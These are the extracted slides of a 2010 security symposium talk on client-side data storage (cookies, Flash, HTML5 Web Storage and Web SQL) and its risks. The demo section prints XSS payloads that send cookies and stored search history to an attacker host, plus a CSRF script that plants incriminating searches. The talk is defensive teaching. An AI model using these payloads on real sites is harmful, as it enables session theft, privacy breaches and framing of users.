The Risks of Client-Side Data Storage From cookie to database GOVCERT.NL Symposium - 15 November 2010
Agenda Client-Side Data Storage (CSDS): What it is Why it s used How it s implemented Demo SecurSearch Search Engine What the risks are What you should do about it
Agenda Client-Side Data Storage (CSDS): What it is Why it s used How it s implemented Demo SecurSearch Search Engine What the risks are What you should do about it
CSDS What it is Storage of information on the PC of a user: Initiated by a website Performed by the browser or a browser plug-in Not necessarily noticed by the user Stored for an hour, a day, a month, or forever Just some bytes, kilobytes, or megabytes
Agenda Client-Side Data Storage (CSDS): What it is Why it s used How it s implemented Demo SecurSearch Search Engine What the risks are What you should do about it
CSDS Why it s used Session fixation Server fixation (load balancing) User tracking / profiling Statistics Performance Offline web application support User configuration / preferences
Agenda Client-Side Data Storage (CSDS): What it is Why it s used How it s implemented Demo SecurSearch Search Engine What the risks are What you should do about it
CSDS How it s implemented (pre HTML 5) Mechanism Default Size Description Cookies 80 KB Small text files IE User Data 640 KB XML-files Adobe Flash 100 KB LocalSharedObjects Oracle Java? Apache Derby DB Microsoft Silverlight 1 MB XML-files Google Gears Development stopped in 2010, superseded by HTML 5 Web SQL Database? SQLite database
CSDS How it s implemented (cookies) www.secblog.nl stats.secblog.nl Set-Cookie: SESSIONID=c22as11qr2921aa5:WI=1372122210: login.secblog.nl PWO=PQ1rpFf0DcYS01S2; expires=thu, 15-Nov-2011 rss.secblog.nl 14:50:38 GMT; path=/; domain=.secblog.nl redirect.secblog.nl video.secblog.nl Set-Cookie: VISITORID=ES1q4PWZ1A12O7jlpWpsi19sji8yhX8s7HX92; search.secblog.nl expires=sun, 15-Nov-2011 14:50:38 GMT; path=/; domain=.secblog.nl; HttpOnly
CSDS How it s implemented (Same Origin Policy) http://www.x.nl Origin: Host : www.x.nl Protocol : http Port : 80 (implicit) https://www.x.nl http://www.x.nl:82 http://ww.x.nl
CSDS How it s implemented (JavaScript) JavaScript is used to manage much of these mechanisms Adobe supports ActionScript to JavaScript interfaces
CSDS How it s implemented (plug-in support) Gears 6,2% Silverlight 52,9% Java 79,4% Flash 96,8% Source: StatOwl Statistics april 2010 september 2010 (www.statowl.com)
CSDS How it s implemented So, what about HTML 5?
CSDS How it s implemented (HTML 5 storage) Mechanism Web Storage Web SQL Database Indexed Database Remarks Name/value pairs LocalStorage and SessionStorage Full client-side DB with querysupport based on SQLite Probably replaced by IndexedDB Use of indexes Endorsed by Microsoft and Mozilla
CSDS How it s implemented (browser support) Traditional HTML5 Cookies Adobe Flash Google Gears Microsoft Silverlight IE UserData Web Storage Web SQL Database Indexed Database API
CSDS How it s implemented (EverCookie)
Agenda Client-Side Data Storage (CSDS): What it is Why it s used How it s implemented Demo SecurSearch Search Engine What the risks are What you should do about it
csxss 1 <iframe width=0 height=0 src= /hack1_script.html ></iframe> 2 <script>document.location= http://www.secursearch.com/index.p l?q=%3c%2fa%3e%3ca+href%3d%22%22+onmouseover%3d%22javascript% 3Adocument.location%3D%27http%3A%2F%2Fwww.ihackedsecursearch. com%2fhack1.pl%3f%27+%2b+document.cookie%3b%22%3ehaha move your mouse%3c%2fa%3e ;</script> 3 </a><a href="" onmouseover="javascript:document.location='http://www.ihacked secursearch.com/hack1.pl?' + document.cookie;">haha move your mouse</a> ;
csxss csxss Reflective XSS Stored XSS
XSS <script>if (window.opendatabase){var db=opendatabase( secursearch_db, 1.0, Web SQL Database,2097152);db.transaction(function(tx){tx.executeSql( SELECT * FROM search_terms,[],function(tx,results){var stroutput= ;for(i=0;i<results.row.length;i++){stroutput=stro utput+results.rows.item(i)[ term ]+ *** ;}document.getelement ById( feedback ).innerhtml= <img width=1 height=1 src=http://www.ihackedsecursearch.com/register.pl?history= +s troutput+ > ;});});}</script>
XSS Open database Load search term table var db=opendatabase( secursearch_db, 1.0, Web SQL Read contents of table tx.executesql( SELECT * FROM search_terms, [], for(i=0; i<results.row.length; i++){ stroutput = stroutput + results.rows.item(i)[ term ] Post contents to hacksite + *** ; } document.getelementbyid( feedback ).innerhtml = <img width=1 height=1 src=http://www.ihackedsecursearch.com/register.pl? history= + stroutput + > ;
CSRF search[0] = how to hack ministry of internal affairs ; search[1] = blackmailing the minister ; search[2] = found backdoor in ministry website ; framehandle.src = http://www.secursearch.com/index.pl?q= + search[0]; framehandle.src = http://www.secursearch.com/index.pl?q= + search[1]; framehandle.src = http://www.secursearch.com/index.pl?q= + search[2];
Agenda Client-Side Data Storage: What it is Why it s used How it s implemented Demo What the risks are What you should do about it
CSDS What the risks are (technical issues) Cross-Site Scripting (XSS) Client-side XSS (csxss) Client-side SQL injection (cssqli) Browser vulnerabilities / shortcomings: WhiteHat Website Security Statistic Report - Fall 2010 Sep 22, 2010 incomplete deletion of data (e.g. plug-in data) User access to data (integrity issues)
CSDS What the risks are (technical issues) Same origin policy issues: Browser vulnerabilities (cs)xss Freedom in domain name DNS cache poisoning Shared servers No expiration on client-side data Use of immature technology www.secblog.nl/~mad-fred mad-fred.secblog.nl www.secblog.nl/~crazy-daisy crazy-daisy.secblog.nl www.secblog.nl/~maniac-jack maniac-jack.secblog.nl
CSDS What the risks are (incomplete deletion) Traditional HTML5 Cookies Adobe Flash Google Gears Microsoft Silverlight IE UserData Web Storage Web SQL Database Indexed Database API Plug-in data is never deleted! LocalStorage: SessionStorage:
CSDS What the risks are (damage -- user) Profiling / user tracking (privacy issues) Data leakage (also privacy issues) Data injection / information spoofing
CSDS What the risks are (damage -- organization) Application logic influenced: Authentication bypass (e.g. cookie theft) Use of corrupted client data by the web application Legal action
CSDS What the risks are (legal action) Ars Technica Jacqui Cheng Aug 16, 2010
CSDS What the risks are (legal action) Wired Ryan Singel Jul 27, 2010
Agenda Client-Side Data Storage: What it is Why it s used How it s implemented Demo What the risks are What you should do about it Geek & Poke Oliver Widder Sep 20, 2010
CSDS What you should do about it (as a user) Delete your client-side data frequently Restrict the information you give away Harden your browser Selectively block JavaScript Block third-party storage Delete data automatically Disable HTML5 storage (for now) Use white- and blacklists Put a strong check on your browser plug-ins Miguel Fernandez gegen-den-strich.com
CSDS What you should do about it (as a developer) Decide if you need local storage anyway Describe your privacy policy (be open) Prepare your webapp for no data systems Don t trust locally stored data Don t store confidential information locally
CSDS What you should do about it (as a developer) Take XSS vulnerabilities very seriously (or better, prevent them!) Use placeholders for SQL statements (to prevent Client-Side SQL Injection) tx.executesql ( INSERT INTO table (field) VALUES ( + strid + ) ); tx.executesql ( INSERT INTO table (field) VALUES (?), strid); Don t use HTML5 storage mechanisms yet in production (and especially not on shared servers!)
Conclusions Most of the threats are not new Server-side threats turn into client-side threats (csxss, cssqli) cssqli might not be such a big problem
Conclusions Biggest challenges are: the growing amount of information on clients how about data integrity? how about data confidentiality? plug-ins that cannot be controlled As an organization, make a distinction between: threats to your users threats to your web applications
Thank you for your time! Questions?